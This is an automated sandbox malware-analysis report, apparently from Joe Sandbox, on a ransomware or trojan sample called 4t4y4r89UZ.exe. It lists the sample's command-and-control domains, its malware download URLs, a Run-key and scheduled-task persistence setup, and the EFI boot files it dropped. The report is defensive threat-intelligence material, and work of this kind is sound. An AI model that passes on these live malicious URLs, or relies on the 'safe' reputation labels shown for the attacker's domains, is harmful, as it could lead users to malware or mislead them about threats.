            https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:0%URL Reputationsafe
            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125560%Avira URL Cloudsafe
            http://gais.cs.ccu.edu.tw/robot.php)Gulper0%VirustotalBrowse
            http://gais.cs.ccu.edu.tw/robot.php)Gulper0%Avira URL Cloudsafe
            https://logs.trumops.com0%Avira URL Cloudsafe
            http://www.spidersoft.com)Wget/1.90%Avira URL Cloudsafe
            https://logs.trumops.comhttps://runmodes.com/api/loghttps://server8.trumops.comC:0%Avira URL Cloudsafe
            https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic0%Avira URL Cloudsafe
            https://retoti.com0%Avira URL Cloudsafe
            https://trumops.comif-unmodified-sinceillegal0%Avira URL Cloudsafe
            http://help.ya0%Avira URL Cloudsafe
            http://devlog.gregarius.net/docs/ua)Links0%URL Reputationsafe
            http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe0%Avira URL Cloudsafe
            https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS0%Avira URL Cloudsafe
            https://runmodes.com/api/log100%Avira URL Cloudmalware
            https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.com0%Avira URL Cloudsafe
            http://grub.org)Mozilla/5.00%Avira URL Cloudsafe
            http://www.everyfeed.c0%Avira URL Cloudsafe
            https://server8.trumops.com0%Avira URL Cloudsafe
            https://trumops.com0%Avira URL Cloudsafe
            http://www.bingmapsportal.comsv0%URL Reputationsafe
            http://www.exabot.com/go/robot)Opera/9.800%URL Reputationsafe
            http://www.googlebot.com/bot.html)Links0%URL Reputationsafe
            https://trumops.comhttps://retoti.com0%Avira URL Cloudsafe
            https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comws2_30%Avira URL Cloudsafe
            https://server8.trumops.com/api/pollf0%Avira URL Cloudsafe
            https://trumops.com/api/install-failureinvalid0%Avira URL Cloudsafe
            https://activity.windows.comr0%URL Reputationsafe
            https://%s.xboxlive.com0%URL Reputationsafe
            https://server8.trumops.com/api/poll0%Avira URL Cloudsafe
            http://gohnot.com/61c75dbee3f325b4d87cddaf5bae33930%Avira URL Cloudsafe
            http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
            http://www.bloglines.com)F0%Avira URL Cloudsafe
            http://misc.yahoo.com.cn/he0%Avira URL Cloudsafe
            https://dynamic.t0%URL Reputationsafe
            http://newscommer.com/app/app.exe100%URL Reputationmalware
            https://server8.trumops.comc=3e3f6b9a36a75d40&uuid=server8.trumops.com:443server8.trumops.com:443tcp0%Avira URL Cloudsafe
            http://crl.g0%URL Reputationsafe
            https://blockchain.infoindex0%URL Reputationsafe
            https://sitescore.aiValue0%Avira URL Cloudsafe
            http://www.avantbrowser.com)MOT-V9mm/00.620%Avira URL Cloudsafe
            https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae0%Avira URL Cloudsafe
            https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae0%Avira URL Cloudsafe
            https://%s.dnet.xboxlive.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            runmodes.com
            		104.21.34.203
            		truefalse
              		high
              gohnot.com
              		172.67.196.11
              		truefalse
                		high
                server8.trumops.com
                		104.21.79.9
                		truefalse
                  		high
                  trumops.com
                  		unknown
                  		unknownfalse
                    		high
                    f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com
                    		unknown
                    		unknownfalse
                      		high
                      logs.trumops.com
                      		unknown
                      		unknownfalse
                        		high
                        e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://runmodes.com/api/logtrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://server8.trumops.com/api/pollfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134aefalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134aefalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://retoti.comidentifiercsrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://search.msn.com/msnbcsrss.exefalse
                            		high
                            https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmpfalse
                              		high
                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpfalse
                                		high
                                https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:csrss.exefalse
                                • URL Reputation: safe
                                		unknown
                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpfalse
                                    		high
                                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmpfalse
                                      		high
                                      https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556csrss.exe, 00000010.00000002.377377894.0000000016814000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397738853.0000000016814000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://gais.cs.ccu.edu.tw/robot.php)Gulpercsrss.exefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpfalse
                                        		high
                                        https://logs.trumops.comcsrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.google.com/bot.html)tls:csrss.exefalse
                                          		high
                                          http://www.spidersoft.com)Wget/1.9csrss.exefalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://logs.trumops.comhttps://runmodes.com/api/loghttps://server8.trumops.comC:csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmpfalse
                                            		high
                                            https://retoti.com4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://trumops.comif-unmodified-sinceillegal4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://help.yacsrss.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpfalse
                                              		high
                                              https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmpfalse
                                                		high
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://devlog.gregarius.net/docs/ua)Linkscsrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS4t4y4r89UZ.exe, 00000000.00000002.299142381.0000000015CBA000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comcsrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://grub.org)Mozilla/5.0csrss.exefalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.everyfeed.ccsrss.exefalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://turnitin.com/robot/crawlerinfo.html)gentracebackcsrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://server8.trumops.comcsrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.558065286.0000000016974000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://trumops.comcsrss.exe, 0000000E.00000002.556988618.0000000016892000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://builtwith.com/biup)csrss.exefalse
                                                        		high
                                                        http://www.bingmapsportal.comsvsvchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.exabot.com/go/robot)Opera/9.80csrss.exefalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.googlebot.com/bot.html)Linkscsrss.exefalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://search.msn.com/msnbot.htm)net/http:csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://trumops.comhttps://retoti.comcsrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comws2_3csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		low
                                                                http://search.msn.com/msnbot.htm)msnbot/1.1csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://server8.trumops.com/api/pollfcsrss.exe, 0000000E.00000002.556753831.0000000016861000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://trumops.com/api/install-failureinvalidcsrss.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.archive.org/details/archive.org_bot)Opera/9.80csrss.exefalse
                                                                          		high
                                                                          http://www.baidu.com/search/spider.htm)MobileSafari/600.1.44t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://yandex.com/bots)Opera/9.51csrss.exefalse
                                                                              		high
                                                                              http://www.google.com/bot.html)Mozilla/5.0csrss.exefalse
                                                                                		high
                                                                                https://activity.windows.comrsvchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://%s.xboxlive.comsvchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		low
                                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393csrss.exe, 0000000E.00000003.380180308.000000001688A000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://https://_bad_pdb_file.pdb4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          http://archive.org/details/archive.org_bot)Mozilla/5.0csrss.exefalse
                                                                                            		high
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.bloglines.com)Fcsrss.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://misc.yahoo.com.cn/hecsrss.exefalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://dynamic.tsvchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://newscommer.com/app/app.execsrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmptrue
                                                                                                • URL Reputation: malware
                                                                                                		unknown
                                                                                                http://www.google.com/feedfetcher.html)HKLMcsrss.exefalse
                                                                                                  		high
                                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://server8.trumops.comc=3e3f6b9a36a75d40&uuid=server8.trumops.com:443server8.trumops.com:443tcpcsrss.exe, 0000000E.00000002.558447548.0000000016AC4000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		low
                                                                                                    http://crl.g4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://blockchain.infoindexcsrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.baidu.com/search/spidecsrss.exefalse
                                                                                                      		high
                                                                                                      http://yandex.com/bots)Opera/9.80csrss.exefalse
                                                                                                        		high
                                                                                                        https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://sitescore.aiValuecsrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.avantbrowser.com)MOT-V9mm/00.62csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		low
                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://search.msn.com/msnbot.htm)pkcs7:4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://activity.windows.comsvchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.alexa.com/help/webmasters;csrss.exefalse
                                                                                                                  		high
                                                                                                                  http://www.google.com/adsbot.html)Encounteredcsrss.exefalse
                                                                                                                    		high
                                                                                                                    https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://%s.dnet.xboxlive.comsvchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		low
                                                                                                                      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmpfalse
                                                                                                                          		high

                                                                                                                          Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          172.67.139.144
                                                                                                                          		unknownUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          104.21.34.203
                                                                                                                          		runmodes.comUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          104.21.79.9
                                                                                                                          		server8.trumops.comUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          172.67.207.136
                                                                                                                          		unknownUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          172.67.196.11
                                                                                                                          		gohnot.comUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                          General Information

                                                                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                          Analysis ID:519673
                                                                                                                          Start date:11.11.2021
                                                                                                                          Start time:01:56:09
                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                          Overall analysis duration:0h 14m 22s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Sample file name:4t4y4r89UZ (renamed file extension from none to exe)
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                          Number of analysed new started processes analysed:53
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:1
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • HDC enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.rans.troj.evad.winEXE@62/18@12/5
                                                                                                                          EGA Information:Failed
                                                                                                                          HDC Information:
                                                                                                                          • Successful, ratio: 96.7% (good quality ratio 50%)
                                                                                                                          • Quality average: 39.2%
                                                                                                                          • Quality standard deviation: 43.3%
                                                                                                                          HCA Information:Failed
                                                                                                                          Cookbook Comments:
                                                                                                                          • Adjust boot time
                                                                                                                          • Enable AMSI
                                                                                                                          Warnings:
                                                                                                                          Show All
                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          01:57:03API Interceptor9x Sleep call for process: 4t4y4r89UZ.exe modified
                                                                                                                          01:57:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow "C:\Windows\rss\csrss.exe"
                                                                                                                          01:57:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow "C:\Windows\rss\csrss.exe"
                                                                                                                          01:57:23API Interceptor9x Sleep call for process: csrss.exe modified
                                                                                                                          01:57:25Task SchedulerRun new task: csrss path: C:\Windows\rss\csrss.exe

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          No context

                                                                                                                          Domains

                                                                                                                          No context

                                                                                                                          ASN

                                                                                                                          No context

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          B:\EFI\Boot\old.efi (copy)
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7680
                                                                                                                          Entropy (8bit):4.486535052248291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                                          MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                                          SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                                          SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                                          SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          B:\EFI\Microsoft\Boot\fw.efi (copy)
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7680
                                                                                                                          Entropy (8bit):4.486535052248291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                                          MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                                          SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                                          SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
